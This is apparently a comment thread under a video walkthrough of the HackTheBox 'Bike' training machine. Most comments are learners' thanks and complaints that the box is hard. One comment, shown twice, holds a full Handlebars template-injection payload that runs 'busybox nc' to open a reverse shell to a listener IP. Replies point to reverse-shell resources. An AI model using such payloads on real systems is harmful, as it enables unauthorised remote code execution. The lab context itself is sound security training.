For a box rated "very easy" this is actually quite difficult. They really should emphasize that these learning paths should be done with the walkthrough.
You're right, what's "easy" and "hard" is always relative to each persons knowledge and experience. It can be hard for experts (like those at HTB) to remember how difficult concepts were when they first covered them 😄 At the same time, you learn a lot during the struggle (but don't be afraid to refer to walkthroughs or ask for help).
At first I felt really guilty having to look some of this stuff up but you do a great job of explaining everything and I'm learning a ton! Thanks so much!
thanks mate 🥰 don't feel guilty! i always recommend spending some time on challenges/boxes before looking up walkthroughs but at some stage it becomes counter productive, gotta find the right balance 😉
Thank you so much for making this! the pdf walkthrough on HTB had me messed up on the last step and I couldn't figure it out for the life of me. Using their guide I got stuck trying to get it to print that I was in the root directory. Watching you go through the documentation and then alter the code to run whoami and then get the flag helped me so much, I just wasn't getting it before this video. Thank you, subbed
Great video, thanks! As a noob, I was a bit overwhelmed by searching throughout all the Node.js documentation and this video really helped to narrow down the search. I am aware that diving in documentation is part and parcel of this, but it saved me some valuable time that I didn't have lately. Thank you!
Awesome, TY! I thought that was quite a difficult (and time consuming) step for most people doing starting point, I can see many getting stuck there xD
Man, just wanted to say thanks, I had gotten all the way to the last step myself and was totally unsure how to finish it off after many an attempt and a bit of head scratching. I watched the whole video anyway as I thought I might learn something else (it's only 20 mins versus about an hour of last step head scratching lol). So thanks a lot. Got yourself a subscriber.
@@_CryptoCat no thank you! I'm just starting out the last two or three months on Ethical Hacking, learned a lot but quite often even the simplest things still stump me! So for HTB especially, you're going to have an avid viewer for when I'm totally lost. Because one thing I've began to learn is, it's crazy how even the simplest and obvious of solutions and methods elude you when you simply don't know. Keep up the great work and much appreciation for sharing your knowledge.
@@kylejf9059 Exactly right mate! Building up a methodology takes time and a lot of pen-testing/CTF is "oh, I saw/did something like this before, best check x,y,z". Best of luck on your journey! 😉
this vid helped me a LOT! I'm just starting out and my issue is thinking outside the box, I'm struggling to think how a veteran would and questioning the security of everything as I only have very limited knowledge. I hope it clicks soon :/ Thanks again
Thanks for the video! The HTB documentation made it out like they wanted you to use the encoded text in Repeater. I finally discovered through your video that I needed to put the unencoded text there instead.
You are so educational with all this. Great expiations the entire time! I was getting irritated that I couldn't figure out burp and the walkthrough HTB had didn't help all that much. You helped so much I will be using you as a resource to help me when I get stuck. Been stuck on this box for two days now lol
FYI: Burpsuite is pre-configured to use it's own browser in Kali Linux. If your project does not work, try re-configuring Burp to work with external browsers like I had to do.
I was stuck on the template part yesterday and no matter what I've sent I had 400 response so I started to look for more info. Funnily enough today everything worked fine, I wonder if my machine was spawned incorrectly the day before :D I do agree with you, this one seems harder than "very easy" tier... Now I understand this better. Very happy I stumbled across your channel, I will be checking more videos for sure. Separate thanks for the burp suite filtering advice
CryptoCat to the rescue :D Thanks for this. I spent ages digging through nodejs doc, completely lost as to what i was looking for, it was time for some help. Besides hours of trial and error, I'm still not sure on how to make that connection to the correct module in the docs, I suppose thats the nature of Pen testing. This has been a really difficult one. Lots to learn! Again many thanks :)
This box is labeled "Very easy" yet I was not able to finish it even tho I finished a Hard box before. Even after following a walkthrough, I'm getting a "SyntaxError: Invalid or unexpected token" error. They should immediately remove the entire box.
Cool video, thanks a lot. I am a noob and just learning, sometimes I want to understand how a specialist should think when solving such problems. And your videos help a lot. The scope of knowledge is striking. Tell me you do not participate in CTF competitions?
Yeh, difficulty ratings are very tricky. It's all relative, what's easy to someone with a few years experience might feel impossible to beginners, or those coming from a different field. You'll get there though, keep it up! 👊
Weird because im an IT technician with a decent grasp of networking concepts and still find it extremely hard. Guess it just takes alot of experience.@@_CryptoCat
Great Video. I do have one question though, how do I get firefox to not redirect me to its "problem loading page" when an error occurs, i.e. 4:29, I just get a default site from ff.
I don't understand why but even though I entered the exact code into the decoder, it will not give me the 'root' output, only the objects. What am I doing incorrectly?
This happens for me a lot as well, not every tool is covered and they accept user-supplied tldr-pages: github.com/tldr-pages/tldr, you can also create your own custom ones and AFAIK.
First of all, thanks to the hard work of the author of the video. I would like to ask a question, is it possible to get a shell for the final steps here? I checked the relevant information on the Internet, and tried to use bash and python to get a reverse shell, but none of them succeeded.
Thank you! I didn't try a reverse shell on this one, you could check a few variations from revshells.com but HTB might have blocked outbound connections.
There are many different types of reverse shell, it will depend on the environment you're trying to connect to. Even if you find the right shell, there may be filters in place that you need to get around. Generally, I use revshells.com - first find the type of shell you are looking for (often netcat with HTB), then try different variations until one works 😉
@@_CryptoCat sorry to disturb you. I just cant understand the injection script which has been used. Could you explain it or any sites which i could learn more about it.
Sure, here's a few articles: portswigger.net/research/server-side-template-injection book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection medium.com/@bdemir/a-pentesters-guide-to-server-side-template-injection-ssti-c5e3998eae68 And videos: ua-cam.com/video/Ffeco5KB73I/v-deo.html ua-cam.com/video/SN6EVIG4c-0/v-deo.html ua-cam.com/video/7sdfT8Z_CPw/v-deo.html
So first of all, great content! I've managed to put a revshell busybox nc "ip-adress" "port" -e sh in the esecSync - looks like this: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return process.mainModule.require('child_process').execSync('busybox nc 10.10.14.120 9001 -e sh');"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} But the shell is only up for a few seconds - can someone explain why?
Hmmmm not too sure on the details but you have a couple of options; you could launch a new shell from your first shell and connect to it on a different port OR try a more stable shell, I always use the "mkfifo" one which I remember 0xdf did an awesome breakdown of: ua-cam.com/video/_q_ZCy-hEqg/v-deo.html
For a box rated "very easy" this is actually quite difficult. They really should emphasize that these learning paths should be done with the walkthrough.
You're right, what's "easy" and "hard" is always relative to each persons knowledge and experience. It can be hard for experts (like those at HTB) to remember how difficult concepts were when they first covered them 😄 At the same time, you learn a lot during the struggle (but don't be afraid to refer to walkthroughs or ask for help).
At first I felt really guilty having to look some of this stuff up but you do a great job of explaining everything and I'm learning a ton! Thanks so much!
thanks mate 🥰 don't feel guilty! i always recommend spending some time on challenges/boxes before looking up walkthroughs but at some stage it becomes counter productive, gotta find the right balance 😉
Thank you so much for making this! the pdf walkthrough on HTB had me messed up on the last step and I couldn't figure it out for the life of me. Using their guide I got stuck trying to get it to print that I was in the root directory. Watching you go through the documentation and then alter the code to run whoami and then get the flag helped me so much, I just wasn't getting it before this video. Thank you, subbed
🙏🥰
thank you so much! this entire thing is insanely confusing but you definitely helped me understand atleast some of it
Glad it helped! 🥰
It's very beneficial to learn programming, this wasn't the easiest one.
Definitely, programming is a key skill for anyone interested in security 💯💯💯
Great video, thanks! As a noob, I was a bit overwhelmed by searching throughout all the Node.js documentation and this video really helped to narrow down the search. I am aware that diving in documentation is part and parcel of this, but it saved me some valuable time that I didn't have lately.
Thank you!
Awesome, TY! I thought that was quite a difficult (and time consuming) step for most people doing starting point, I can see many getting stuck there xD
Unreal. I had a hard time with burpsuite but got there in the end
Awesome! Nice work 👊
So did I
thank you man, you are my hero. most of noobs like me just having issue finding global to use, you really help a lot.
🙏🥰
"very easy" they said, it will be fun they said :(
d'awww *hugs*
Yea this box wasnt very easy at all😅😂
Man, just wanted to say thanks, I had gotten all the way to the last step myself and was totally unsure how to finish it off after many an attempt and a bit of head scratching. I watched the whole video anyway as I thought I might learn something else (it's only 20 mins versus about an hour of last step head scratching lol).
So thanks a lot. Got yourself a subscriber.
thanks mate 🙏🥰
@@_CryptoCat no thank you!
I'm just starting out the last two or three months on Ethical Hacking, learned a lot but quite often even the simplest things still stump me! So for HTB especially, you're going to have an avid viewer for when I'm totally lost. Because one thing I've began to learn is, it's crazy how even the simplest and obvious of solutions and methods elude you when you simply don't know.
Keep up the great work and much appreciation for sharing your knowledge.
@@kylejf9059 Exactly right mate! Building up a methodology takes time and a lot of pen-testing/CTF is "oh, I saw/did something like this before, best check x,y,z". Best of luck on your journey! 😉
this vid helped me a LOT! I'm just starting out and my issue is thinking outside the box, I'm struggling to think how a veteran would and questioning the security of everything as I only have very limited knowledge.
I hope it clicks soon :/
Thanks again
Thanks for the video! The HTB documentation made it out like they wanted you to use the encoded text in Repeater. I finally discovered through your video that I needed to put the unencoded text there instead.
Well, I guess I should thank HTB for providing incorrect information, leading people to find my videos 😂
You are so educational with all this. Great expiations the entire time! I was getting irritated that I couldn't figure out burp and the walkthrough HTB had didn't help all that much. You helped so much I will be using you as a resource to help me when I get stuck. Been stuck on this box for two days now lol
awww thanks mate! glad it could help 🥰
FYI: Burpsuite is pre-configured to use it's own browser in Kali Linux. If your project does not work, try re-configuring Burp to work with external browsers like I had to do.
Thank you so much for these videos. You have helped me so much already on this journey.
love to hear it! thanks mate 🙏🥰
Thanks for your efforts ... great help
I was stuck on the template part yesterday and no matter what I've sent I had 400 response so I started to look for more info.
Funnily enough today everything worked fine, I wonder if my machine was spawned incorrectly the day before :D
I do agree with you, this one seems harder than "very easy" tier... Now I understand this better. Very happy I stumbled across your channel, I will be checking more videos for sure. Separate thanks for the burp suite filtering advice
🙏🥰
CryptoCat to the rescue :D Thanks for this. I spent ages digging through nodejs doc, completely lost as to what i was looking for, it was time for some help. Besides hours of trial and error, I'm still not sure on how to make that connection to the correct module in the docs, I suppose thats the nature of Pen testing. This has been a really difficult one. Lots to learn! Again many thanks :)
No problem at all 💜
THANK YOU
Great video as always ..... waiting for the next video in the pwn series :)
Awww thanks 🥰 New pwn video tomorrow (injecting shellcode) 😉
@@_CryptoCat Awesome !!
I can't believe this is "starting point" I get that we need to learn but someimes we would be LOST without people like you!
Thank you & bad HTB! :P
😂👌
no way this was starting point. i felt this box just assumes that everyone is a seasoned web dev
This box is labeled "Very easy" yet I was not able to finish it even tho I finished a Hard box before. Even after following a walkthrough, I'm getting a "SyntaxError: Invalid or unexpected token" error.
They should immediately remove the entire box.
Great videoo!!
Thanks!
🥰
This a great video... thanks a bunch...
Thank you! ☺
Great Video! 💙
thanks mate 💜
Excellent explanation!!! Subscribed!
Thank you! 💜
never used burp suite before so i learned the whole course at htb academy, only to find out that i still don't know how to do this lab LOL
😂
Cool video, thanks a lot.
I am a noob and just learning, sometimes I want to understand how a specialist should think when solving such problems. And your videos help a lot. The scope of knowledge is striking.
Tell me you do not participate in CTF competitions?
thanks mate 🥰 i play ctfs as much as i can xD
Hardest box on Tier 1, took me a couple hours never found the flag got very close though. This is a very difficult box for being labeled "easy".
Yeh, difficulty ratings are very tricky. It's all relative, what's easy to someone with a few years experience might feel impossible to beginners, or those coming from a different field. You'll get there though, keep it up! 👊
Weird because im an IT technician with a decent grasp of networking concepts and still find it extremely hard. Guess it just takes alot of experience.@@_CryptoCat
Great Video. I do have one question though, how do I get firefox to not redirect me to its "problem loading page" when an error occurs, i.e. 4:29, I just get a default site from ff.
thanks! not sure about that one, it should just show the error page by default 😕
Great job, really helpful! :)
Thank you! 😊
I don't understand why but even though I entered the exact code into the decoder, it will not give me the 'root' output, only the objects. What am I doing incorrectly?
Ermmm really hard to say but most likely some small typo somewhere, it's the source of most of my problems anyway 😂
@@_CryptoCat Awesome thank you so much. I figured as much. Someone else said something similar to me today so I will revisit.
Hi, TLDR gives back error text, no entry for the above used things. Do I need to update/write my own things for it, or what?
This happens for me a lot as well, not every tool is covered and they accept user-supplied tldr-pages: github.com/tldr-pages/tldr, you can also create your own custom ones and AFAIK.
can u let me know what specs are u giving to your parrot vm?
Of course! imgur.com/a/vRjGQ4K
First of all, thanks to the hard work of the author of the video. I would like to ask a question, is it possible to get a shell for the final steps here? I checked the relevant information on the Internet, and tried to use bash and python to get a reverse shell, but none of them succeeded.
Thank you! I didn't try a reverse shell on this one, you could check a few variations from revshells.com but HTB might have blocked outbound connections.
what's the right payload for a reverse shell?
There are many different types of reverse shell, it will depend on the environment you're trying to connect to. Even if you find the right shell, there may be filters in place that you need to get around. Generally, I use revshells.com - first find the type of shell you are looking for (often netcat with HTB), then try different variations until one works 😉
can you explain regarding the script SSTI for hacktricks which has been used in this BIKE challenge
Been a while since I did this machine, any specific part of the SSTI you are confused about?
@@_CryptoCat sorry to disturb you. I just cant understand the injection script which has been used. Could you explain it or any sites which i could learn more about it.
Sure, here's a few articles:
portswigger.net/research/server-side-template-injection
book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
medium.com/@bdemir/a-pentesters-guide-to-server-side-template-injection-ssti-c5e3998eae68
And videos:
ua-cam.com/video/Ffeco5KB73I/v-deo.html
ua-cam.com/video/SN6EVIG4c-0/v-deo.html
ua-cam.com/video/7sdfT8Z_CPw/v-deo.html
Uhhh...i'm not...sure exactly how I was supposed to figure this out without a complete handhold lmao. I think this might be the worst one yet.
So first of all, great content!
I've managed to put a revshell busybox nc "ip-adress" "port" -e sh in the esecSync - looks like this:
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return process.mainModule.require('child_process').execSync('busybox nc 10.10.14.120 9001 -e sh');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
But the shell is only up for a few seconds - can someone explain why?
Hmmmm not too sure on the details but you have a couple of options; you could launch a new shell from your first shell and connect to it on a different port OR try a more stable shell, I always use the "mkfifo" one which I remember 0xdf did an awesome breakdown of: ua-cam.com/video/_q_ZCy-hEqg/v-deo.html